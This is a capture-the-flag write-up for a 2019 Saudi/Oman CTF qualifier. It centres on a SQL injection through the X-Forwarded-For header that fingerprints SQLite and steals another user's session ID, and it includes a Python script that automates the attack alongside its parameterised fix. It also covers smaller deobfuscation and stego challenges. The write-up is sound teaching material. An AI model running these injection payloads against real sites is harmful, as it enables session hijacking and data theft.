Information#
CTF#
- Name : Saudi and Oman National Cyber Security CTF 2019 Quals
- Website : cybertalents.com
- Type : Online
- Format : Jeopardy
- CTF Time : link
200 - Maria - Web#
Maria is the only person who can view the flag
If you access the page with your own valid session cookie, you won't see anything, e.g.:

```shell
$ curl -v http://35.222.174.178/maria/ -H 'Cookie: PHPSESSID=4l1vrp9q0tvgbjua7ddp9g2jh1;'
```
But if you request the page without a cookie, you'll get an interesting result before the HTML content (I edited my IP address):

```shell
$ curl http://35.222.174.178/maria/
```
Let's try to spoof our IP address:

```shell
$ curl -v http://35.222.174.178/maria/ -H 'X-Forwarded-For: 127.0.0.1'
```

The fake IP address is reflected, so we are able to control the output through the X-Forwarded-For HTTP header.
Let's find the number of columns with an error-based SQLi:

```shell
$ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1-- -" | head -1
```

From the resulting error we learn that the query targets nxf8_sessions, which has 4 columns.
Let's find out whether a time-based injection is possible:

```shell
$ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' OR SLEEP(5)-- -" | head -1
```

SLEEP() seems to be unavailable; it only exists in MySQL 5.0.12 and later, so this is either an old MySQL or a different DBMS.

```shell
$ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' OR BENCHMARK(100000000, rand())-- -" | head -1
```

No BENCHMARK() either, so it is not MySQL.

```shell
$ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' OR randomblob(100000000)-- -" | head -1
```

randomblob() being accepted tells us it is a SQLite database, and the delay (SQLite has no sleep function, but generating a 100 MB blob takes measurable time) tells us that a time-based exploitation would work.
Let's guess other tables than nxf8_sessions following the same naming scheme (the guess shown here is one of several attempts):

```shell
$ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT * FROM nxf8_persons-- -" | head -1
```

A nxf8_users table turns out to exist, with a different number of columns than nxf8_sessions (the UNION fails with a column-count mismatch rather than a missing-table error).
Let's guess some probable column names:

```shell
$ curl -s http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT name,password,1,1 FROM nxf8_users where name='maria'-- -" | head -1
```

So far I found these tables and columns:

- nxf8_sessions
  - id
  - user_id
  - ip_address
  - session_id
- nxf8_users
  - id
  - name
  - password
  - role
  - more unidentified columns
Now that we have the right table and columns, let's think about the payload we need:

```
X-Forwarded-For: 127.0.0.1' UNION SELECT session_id,1,1,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -
```

which makes the server execute the following query:

```sql
SELECT * FROM nxf8_sessions where ip_address = '127.0.0.1' UNION SELECT session_id,1,1,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -';
```
Let's execute that:

```shell
$ curl --head http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1,1,session_id,1 FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -"
```

We can see that Set-Cookie: PHPSESSID appears twice, and the second one is PHPSESSID=1;.
As we sent a SELECT 1, this must be the result of our query; we are selecting 4 columns but only one of them is reflected here, so let's change the order in the SELECT clause. Finally we find that the 4th column is the one injected into the PHPSESSID value, so we need to send 1,1,1,session_id.
```shell
$ curl --head http://35.222.174.178/maria/ -H "X-Forwarded-For: 127.0.0.1' UNION SELECT 1,1,1,session_id FROM nxf8_sessions WHERE user_id=(SELECT id FROM nxf8_users WHERE name='Maria')-- -"
```

But this way two cookies with the same key PHPSESSID are set, and only the first one is used by the server, so we still don't see anything.
Let's just make a normal request without injection and with only the right cookie:

```shell
$ curl http://35.222.174.178/maria/ -H 'Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968'
```

Now we get Hello Maria : your secret flag is : aj9dhAdf4.
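The whole chain above (fingerprinting the engine by which functions error out, counting the UNION columns, guessing tables, and finally pulling Maria's session_id through the one reflected column) as an added, self-contained Python example that is not part of the original write-up. It runs against a constructed in-memory SQLite database whose table and column names are the ones recovered above; the column types, the row contents and the extra nxf8_users columns are assumptions. The vulnerable lookup, which splices X-Forwarded-For straight into the SQL string the way the challenge appears to, is shown beside its parameterised form, the one-line change that would have closed the challenge.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database. Table and column
# names are the ones recovered in the write-up; the types, the extra nxf8_users
# columns and the row contents are assumptions made for this demo.
SCHEMA = """
CREATE TABLE nxf8_users (id INTEGER PRIMARY KEY, name TEXT, password TEXT, role TEXT);
CREATE TABLE nxf8_sessions (id INTEGER PRIMARY KEY, user_id INTEGER,
                            ip_address TEXT, session_id TEXT);
INSERT INTO nxf8_users VALUES (1, 'Maria', 'not-the-flag', 'admin');
INSERT INTO nxf8_users VALUES (2, 'bob', 'hunter2', 'user');
INSERT INTO nxf8_sessions VALUES (1, 1, '10.0.0.5', 'fd2030b53fc9a4f01e6dbe551db7ded390461968');
INSERT INTO nxf8_sessions VALUES (2, 2, '10.0.0.9', '4l1vrp9q0tvgbjua7ddp9g2jh1');
"""


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def session_for_ip_vulnerable(db, xff):
    """What the challenge appears to do: look the session up by the client IP
    taken from X-Forwarded-For, spliced straight into the SQL string. The 4th
    column of every returned row ends up in a Set-Cookie: PHPSESSID=... header."""
    sql = "SELECT * FROM nxf8_sessions WHERE ip_address = '%s'" % xff
    return [row[3] for row in db.execute(sql).fetchall()]


def session_for_ip_safe(db, xff):
    """Hardened form: a bound parameter, so the header can only ever be a string value."""
    sql = "SELECT * FROM nxf8_sessions WHERE ip_address = ?"
    return [row[3] for row in db.execute(sql, (xff,)).fetchall()]


def probe(db, payload):
    """Send one payload and report what the error page would reveal."""
    try:
        return "ok", session_for_ip_vulnerable(db, payload)
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def fingerprint_dbms(db):
    """Error-based variant of the SLEEP/BENCHMARK/randomblob probes: a function
    the engine lacks raises 'no such function'. (On the real target the author
    used randomblob(100000000) so that the delay itself was measurable.)"""
    found = {}
    for func in ("SLEEP(1)", "BENCHMARK(1, rand())", "randomblob(1)"):
        status, msg = probe(db, "127.0.0.1' OR %s-- -" % func)
        found[func.split("(")[0]] = not (status == "error" and "no such function" in msg)
    return found


def count_columns(db, max_cols=16):
    """Widen UNION SELECT 1,1,... until SQLite stops complaining that the left
    and right SELECTs have different numbers of result columns."""
    for n in range(1, max_cols + 1):
        status, _ = probe(db, "127.0.0.1' UNION SELECT %s-- -" % ",".join(["1"] * n))
        if status == "ok":
            return n
    return None


def table_exists(db, table):
    """'no such table' means absent; a column-count mismatch still proves it exists."""
    status, msg = probe(db, "127.0.0.1' UNION SELECT * FROM %s-- -" % table)
    return not (status == "error" and "no such table" in msg)


def steal_session(db, username, ncols=4, reflected=4):
    """Place session_id in the column the page reflects (the 4th one here)."""
    cols = ["1"] * ncols
    cols[reflected - 1] = "session_id"
    payload = ("127.0.0.1' UNION SELECT %s FROM nxf8_sessions "
               "WHERE user_id=(SELECT id FROM nxf8_users WHERE name='%s')-- -"
               % (",".join(cols), username))
    return session_for_ip_vulnerable(db, payload)


if __name__ == "__main__":
    db = new_db()
    print("functions available:", fingerprint_dbms(db))
    print("columns in nxf8_sessions:", count_columns(db))
    print("nxf8_persons exists:", table_exists(db, "nxf8_persons"))
    print("nxf8_users exists:", table_exists(db, "nxf8_users"))
    print("Maria's session:", steal_session(db, "Maria"))
    print("same payload, parameterised:",
          session_for_ip_safe(db, "127.0.0.1' UNION SELECT 1,1,1,session_id FROM nxf8_sessions-- -"))
```

The parameterised lookup returns nothing for the injected header because the whole string is compared as a literal IP value. Note that even the fixed query still trusts X-Forwarded-For as the client identity; a session bound to a client-supplied header is hijackable by anyone who can guess the victim's IP, so the header should only be honoured when it comes from a trusted proxy.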
50 - Back to basics - Web#
not pretty much many options. No need to open a link from a browser, there is always a different way
http://35.197.254.240/backtobasics redirects (HTTP 302) to http://35.197.254.240/backtobasics/, and we can see there are 4 authorized HTTP verbs: GET, POST, HEAD, OPTIONS.

There is also document.location = "http://www.google.com"; making a JavaScript redirect to the Google website.

```shell
$ curl -v http://35.197.254.240/backtobasics/
```
Let's try another method like POST:

```shell
$ curl -X POST http://35.197.254.240/backtobasics/
```
We got an HTML comment embedding obfuscated JavaScript code.

```javascript
var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];
```
Let's deobfuscate it and correct it manually (the string array lists the operations: split, reverse, join, then log):

```javascript
var reversed_flag = "ceab068d9522dc567177de8009f323b2";
console.log(reversed_flag.split("").reverse().join(""));
```

By executing the above code in our browser console we get 2b323f9008ed771765cd2259d860baec.
.
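The manual step above generalises to any code produced by the common `_0xNAME[n]` string-array obfuscators: inline every array lookup back into a string literal, then turn `obj["prop"]` back into `obj.prop`. The following Python helper is an added example, not code from the write-up or the challenge. The string array is the one the challenge served; the obfuscated statement it is applied to is a constructed stand-in written in the same style, because the write-up does not reproduce the original statement.

```python
import json
import re

# The string array the challenge served (copied from the write-up).
STRING_ARRAY = ["", "join", "reverse", "split", "log", "ceab068d9522dc567177de8009f323b2"]

# Constructed stand-in for the statement that used the array: the write-up does
# not reproduce it, so this is an assumption written in the same _0xNAME[n] style.
OBFUSCATED = ('console[_0x7f88[4]](_0x7f88[5][_0x7f88[3]](_0x7f88[0])'
              '[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0]))')


def inline_string_array(code, array_name, strings):
    """Replace every array_name[n] lookup with the string literal at index n."""
    pattern = re.escape(array_name) + r"\[(\d+)\]"
    return re.sub(pattern, lambda m: json.dumps(strings[int(m.group(1))]), code)


def dotify(code):
    """Rewrite obj["prop"] as obj.prop when prop is a plain identifier."""
    return re.sub(r'\["([A-Za-z_$][\w$]*)"\]', r".\1", code)


def deobfuscate(code, array_name, strings):
    """Both passes together: readable JavaScript that can be reviewed before running."""
    return dotify(inline_string_array(code, array_name, strings))


def reverse_string(s):
    """What the recovered JavaScript does: split("").reverse().join("")."""
    return s[::-1]


if __name__ == "__main__":
    print(deobfuscate(OBFUSCATED, "_0x7f88", STRING_ARRAY))
    print(reverse_string(STRING_ARRAY[5]))
```

Reading the inlined code before executing anything is the point: on a real page the same array trick can hide a fetch to an attacker's host just as easily as a string reversal.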
50 - I love images - Stego#
A hacker left us something that allows us to track him in this image, can you find it?
One-liner:

```shell
$ strings godot.png | tail -1 | base32 -d
```
50 - Just Another Conference - Quiz#
famous Cybersecurity conference runs by OWASP in different locations

Answer: AppSec
Experience feedback#
Pros:
- Stable platform
- Fair duration
Cons:
- No team, only individual
- Few challenges: 9
- Unrealistic challenges
- Some challenges are unrelated to security: the stego challenges are not about true steganography but just fun/joy useless challenges requiring guessing
- Bad categorization: most forensics challenges were in fact some stego challenges
- Too much personal information is required for the registration, like phone number, sex, the university you attended, real name, etc., whereas only a pseudonym and an email address should be required.
Conclusion: Challenges are quite easy and target high school students who have some notions about security. But the challenge quality is rather low, and if you already have the basics you won't learn anything useful for real life because the challenges are all unrealistic. However, as a student you can still learn the basics or tricks that only exist in CTFs.